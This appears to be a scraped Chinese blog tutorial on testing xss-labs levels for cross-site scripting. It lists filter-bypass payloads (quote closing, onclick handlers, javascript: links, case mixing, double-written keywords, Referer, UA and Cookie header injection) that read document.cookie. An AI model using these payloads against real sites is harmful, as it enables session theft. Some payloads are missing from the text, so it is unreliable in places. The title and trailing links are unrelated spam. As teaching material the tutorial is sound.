当前位置: 首页 > news >正文

南宁哪里有做开通网站的阿里云云服务器 网站配置

南宁哪里有做开通网站的,阿里云云服务器 网站配置,网站描述更改,电子商务网站开发需求分析文章目录 测试流程1.开启burp2.测试常规xss语句3.观察回显4.测试闭合与绕过Level2Level3Level4Level5Level6Level7 5.xss绕过方法1)测试需观察点2)无过滤法3)">闭合4)单引号闭合事件函数5)双引号闭合事件函数6)引号闭合链接7)大小写绕过8)多写绕过9)unicode编码10)unic…

文章目录

  • 测试流程
  • 1.开启burp
  • 2.测试常规xss语句
  • 3.观察回显
  • 4.测试闭合与绕过
    • Level2
    • Level3
    • Level4
    • Level5
    • Level6
    • Level7
  • 5.xss绕过方法
    • 1)测试需观察点
    • 2)无过滤法
    • 3)">闭合
    • 4)单引号闭合+事件函数
    • 5)双引号闭合+事件函数
    • 6)引号闭合+链接
    • 7)大小写绕过
    • 8)多写绕过
    • 9)unicode编码
    • 10)unicode编码+//注释
    • 11)隐藏标签赋值
    • 12)referer注入
    • 13)UA头注入
    • 14)Cookie注入
    • 15)`替换()
    • 16)实体编码绕过
    • 17)--!>注释绕过

测试流程

先看bp
再看回显
测试常规xss语句
接着看F12上下文
然后是构造闭合
最后是依次测试绕过方法
成功的时候要能得到一个可以复现的url

1.开启burp

正常输入看响应包和发送包有没有相同点
在这里插入图片描述

如果没有进入第二步

2.测试常规xss语句

一般选即可,或,或 οnclick=alert(document.cookie)
只用做轮子测试,如果还不行,进入下一步

3.观察回显

比如上一步中输入,输入框回显异常

在这里插入图片描述

4.测试闭合与绕过

Level2

在这里插入图片描述

F12观察输入框位置上下文

可以发现语句存在需要闭合的地方,改成"><img src="javascript:alert(‘XSS’)后语句看起来才正常
在这里插入图片描述

所以轮子应该类似">{javascript}

Level3

">//
在这里插入图片描述

此处使用了htmlspecialchars转义了<>等特殊字符,使得尖括号里的代码不能执行,如果找不到绕过方法,只能执行事件函数,比如onclick,直接结束
&:转换为&
“:转换为”
':转换为成为 ’
<:转换为<

:转换为>
由上可以看出单引号没有转义,可以用它来做闭合

Level4

同上

Level5

发现过滤了on,会在on之间插入_,ri也被过滤
因此只能找不带on和

Level6

这关链接也被过滤,但是可以通过大小写绕过
" oNclick=alert(document.cookie) "
总结:xss不要直接修改页面代码,要在输入框中构造,进而产生url链接

Level7

多写绕过
" oonnclick=alert(document.cookie) "
以此步骤测试,先看bp,再看回显,接着看F12,然后是看闭合,最后是依次测试绕过方法

5.xss绕过方法

1)测试需观察点

浏览器左下角查看器,查找注入点所在代码
burp响应包referer/UA/cookie三处位置看是否在提交包中有对应信息
xss不要直接修改页面代码,要在输入框中构造,进而产生url链接

2)无过滤法

3)">闭合

">

4)单引号闭合+事件函数

’ οnclick=’ alert(“123”);

5)双引号闭合+事件函数

" οnclick=alert(‘123’);"

6)引号闭合+链接

"><a href=javascript:alert(‘xss’)>xss

7)大小写绕过

"><a hRef=javascript:alert(‘xss’)>xss

8)多写绕过

" oonnclick=alert(‘123’);"

9)unicode编码

javascript:alert(‘xss’)
javascrIpt:alert(‘xss’)

10)unicode编码+//注释

javascript:alert(‘xss’)//http://www.baidu.com
javascript:alert(‘xss’)//http://

11)隐藏标签赋值

t_sort=123" type=“” οnclick="alert(‘xss’)

12)referer注入

“ type=”” οnclick=”alert(document.cookie)

13)UA头注入

“ type=”” οnclick=”alert(document.cookie)

14)Cookie注入

“ οnclick="alert(‘xss’) type=”

15)`替换()

16)实体编码绕过

https://www.qqxiuzi.cn/bianma/zifushiti.php

17)–!>注释绕过

注释方式有两种:

http://www.yayakq.cn/news/715045/

相关文章:

  • 网站后台文章字体响应式模版移动优化
  • 个人网站服务器一年多少钱天元建设集团有限公司商业承兑
  • 网站设计开发人员招聘河南省建设厅网站总经济师
  • 域名服务网站网站建设前景怎么样
  • 商业网站建设方案手机网站制作教程软件
  • 平面设计手绘网站网站开发项目启动成本
  • 初学者做网站wordpress4.7源码下载
  • 平台营销型网站自助企业建站模版
  • 公司网站想维护服务器建筑企业招聘网站
  • 淮南家居网站建设怎么样网站宣传的劣势
  • 网站的管理建设公司网站要注意什么
  • 中国网站建设集团深圳专业建站系统建站公司
  • 怎么拥有个人网站分栏型网站
  • 宿迁市建设局网站首页东莞网站公司推广技巧
  • 单页网站怎么做竞价成都网站建设优创
  • 上海优化排名网站合肥网站制作方案
  • 商城网站怎么优化wordpress插件许可
  • 广告网站建设最专业用自己照片做衣服_杯子的是哪个网站
  • 国外开网站怎样做平帐企业建站程序有哪些
  • 化工网站开发网站图片 优化
  • 广州市建设工程造价管理站网站开发私单哪里接
  • 杭州网站设计网站注册公司法人年龄要求
  • 网站开发和维护织梦网站怎么做安全措施
  • 快速网站仿制WordPress桌面
  • 网站的meta标签优化网页网站设计与制作
  • 滨州教育平台 网站建设浪尖工业设计公司
  • 厦门建设厅查询网站苏州seo推广优化
  • 品牌商标购买网站股票查询网站模板 wordpress
  • 江苏省建设通官方网站新公司如何做推广
  • 我有域名跟空间能教我做网站吗wordpress 轻论坛